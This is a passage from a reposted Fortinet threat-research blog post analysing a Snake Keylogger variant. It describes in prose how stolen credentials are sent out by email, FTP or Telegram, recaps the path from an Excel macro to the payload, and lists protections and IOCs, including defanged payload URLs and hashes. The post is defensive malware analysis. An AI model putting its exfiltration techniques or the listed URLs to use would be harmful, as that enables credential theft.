class=\"cmp-image--title\">Figure 5.1 \u2013 Craft email with stolen credentials<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 5.1 shows crafting the email with stolen credentials to be sent to the attacker. The bottom is the email\u2019s Subject and Body. The stolen credentials are put in two attachments, \u201cPasswords.txt\u201d and \u201cUser.txt\u201d. Figure 5.2 is a screenshot of \u201cPassword.txt\u201d attached to the email sent to the attacker with basic information and credentials stolen from my testing Windows system.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--offset--default--4 aem-GridColumn--default--5\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_336698810.img.png\/1635972356954\/picture16.png\" alt=\"Figure 5.2 \u2013 Example of \u201cPassword.txt\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.2 \u2013 Example of \u201cPassword.txt\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>To send stolen data to the attacker, it defines some variables containing the sender\u2019s email address, password, SMTP server address, and SMTP port, as shown in figure 5.3. It defines the variables in the class\u2019s constructor function.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_282522549.img.png\/1635972397815\/picture17.png\" alt=\"Figure 5.3 \u2013 The attacker\u2019s email address is hard-coded in constructor function.\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.3 \u2013 The attacker\u2019s email address is hard-coded in constructor function.<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Besides sending data via email, this Snake Keylogger variant also offers FTP and Telegram\u00a0methods to submit collected sensitive data to the attacker.\u00a0<\/p>\n<p>For FTP, the attacker needs to set up an FTP server and then tell Snake Keylogger the address of the FTP server and credentials for Snake Keylogger to upload stolen sensitive data.<\/p>\n<p>For Telegram, Snake Keylogger uses the \u201csendDocument\u201d\u00a0method of the \u201cTelegram Bot API\u201d to submit its stolen data to the Telegram account that the attacker provides. Refer to Figure 5.4 for more information about the method of Telegram.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1026916908.img.png\/1635972436432\/picture18.png\" alt=\"Figure 5.4 \u2013 Partial code of submitting data using Telegram\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.4 \u2013 Partial code of submitting data using Telegram<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Conclusion on Snake Keylogger Malware\u00a0<\/h2>\n<p>In order to better understand the entire process of this malware, I drew a flow chart in Figure 6.1 that outlines the main steps explained in this analysis.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image_1095875477.img.png\/1635972503891\/picture19.png\" alt=\"Figure 6.1 \u2013 The flow chart of the variant of Snake Keylogger\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6.1 \u2013 The flow chart of the variant of Snake Keylogger<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>At the beginning of this analysis, we went through how a malicious Macro inside an Excel document executes PowerShell that downloads the Snake Keylogger&#8217;s downloader.\u00a0<\/p>\n<p>Next, I focused more on how the Snake Keylogger installer performs persistence on the victim&#8217;s device and the complicated, tricky way it extracts the payload of Snake Keylogger.<\/p>\n<p>I then elaborated on the features this variant of Snake Keylogger offers, like recording keystrokes, collecting credentials data, clipboard data, and screenshots.\u00a0<\/p>\n<p>And finally, I explained how the collected data is submitted to the attacker via email, as well as two other methods: FTP and Telegram.<\/p>\n<h2>Fortinet Protections<\/h2>\n<p>Fortinet customers are already protected from this malware by <a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/web-filtering.html?utm_source=blog&amp;utm_campaign=web-filtering\">FortiGuard\u2019s Web Filtering<\/a>, AntiVirus, <a href=\"https:\/\/www.fortinet.com\/products\/endpoint-security\/fortiedr.html?utm_source=blog&amp;utm_campaign=fortiedr\">FortiEDR<\/a>, and CDR (content disarm and reconstruction) services, as follows:<\/p>\n<p>The malicious Macro inside the Excel sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction) service.<\/p>\n<p>All relevant URLs have been rated as &quot;<b>Malicious Websites<\/b>&quot; by the FortiGuard Web Filtering service.<\/p>\n<p>The\u00a0original Excel sample and Snake Keylogger downloader files are detected as &quot;<b>VBA\/SnakeKeylogger.84D0!tr<\/b>&quot; and &quot;<b>MSIL\/SnakeKeylogger.ADFA!tr<\/b>&quot; and are blocked by the FortiGuard AntiVirus service.<b><\/b><\/p>\n<p>FortiEDR detects the downloaded executable file as malicious\u00a0based on its behavior.<\/p>\n<p>FortiMail protects Fortinet customers by blocking phishing emails.<\/p>\n<p>We also suggest that readers go\u00a0through the\u00a0free\u00a0<a href=\"https:\/\/training.fortinet.com\/?utm_source=blog&amp;utm_campaign=nse-institute\">NSE training<\/a>:\u00a0<a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE 1 \u2013 Information Security Awareness<\/a>, which has a module on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.<\/p>\n<h2>IOCs<\/h2>\n<p><b>URLs:<\/b><\/p>\n<p>&quot;hxxp[:]\/\/3[.]64[.]251[.]139\/v3\/2\/Requests07520000652.exe&quot;<br \/> &quot;hxxps[:]\/\/store2[.]gofile[.]io\/download\/0283e6ba-afc6-4dcb-b2f4-3173d666e2c4\/Huzeigtmvaplpinhoo.dll&quot;<\/p>\n<p><b>Sample SHA-256:<\/b><\/p>\n<p>[SOA# 1769.xlsm]<br \/> 3B437BAA9A07E9DECE2659F20B5D97F8F729BA077D399933041CDC656C8D4D04<\/p>\n<p>[Requests07520000652.exe or\u00a0Wheahmnfpgaqse.exe]<br \/> 53D520C1F12FE4E479C6E31626F7D4ABA5A65D107C1A13401380EBCA7CCA5B05<\/p>\n<p><b>References:<\/b><\/p>\n<p>https:\/\/blog.checkpoint.com\/2021\/08\/12\/july-2021s-most-wanted-malware-snake-keylogger-enters-top-10-for-first-time\/<br \/> https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/system.appdomain.assemblyresolve?view=net-5.0<br \/> https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/system.appdomain.resourceresolve?view=net-5.0<\/p>\n<p><i>Learn more about Fortinet\u2019s\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguard-labs\"><i>FortiGuard Labs<\/i><\/a><i>\u00a0threat research and intelligence organization and the FortiGuard Security Subscriptions and Services\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?tab=security-bundles&amp;utm_source=blog&amp;utm_campaign=security-bundles\"><i>portfolio<\/i><\/a><i>.<\/i><\/p>\n<p><i>Learn more about Fortinet\u2019s\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/training\/cybersecurity-professionals?utm_source=blog&amp;utm_medium=campaign&amp;utm_campaign=Freetraininginitiative\"><i>free cybersecurity training<\/i><\/a><i>,\u00a0an initiative of Fortinet\u2019s Training Advancement Agenda (TAA), or about the\u00a0<\/i><a href=\"https:\/\/training.fortinet.com\/?utm_source=blog&amp;utm_campaign=nse-institute\"><i>Fortinet\u00a0Network Security Expert program<\/i><\/a><a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=fnsa&amp;utm_source=pr&amp;utm_campaign=fnsa\"><i>,\u00a0Security Academy program<\/i><\/a><i>,\u00a0and\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/corporate\/careers\/vets.html?utm_source=blog&amp;utm_campaign=fortivet\"><i>Veterans program<\/i><\/a><i>. Learn more about\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=FortiGuardLabs\"><i>FortiGuard Labs<\/i><\/a><i>\u00a0global threat intelligence and research and the\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/support\/support-services\/fortiguard-security-subscriptions\/fortiguard-services-bundles.html?utm_source=blog&amp;utm_campaign=fortiguard-service-bundles\"><i>FortiGuard Security Subscriptions and Services<\/i><\/a><i>\u00a0portfolio.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<div id=\"om-qbkzwxxbiv83f0ol5a2d-holder\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware\/_jcr_content\/root\/responsivegrid\/image.img.png\/1635971358250\/picture1.png\"\/><br \/>FortiGuard Labs recently discovered a fresh variant of the Snake Keylogger malware. Learn how it is downloaded and executed through a captured Excel sample, what techniques this variant uses to protect it from being analyzed, and what sensitive information it steals from a victim\u2019s machine.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-17983","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17983","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=17983"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17983\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=17983"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=17983"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=17983"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}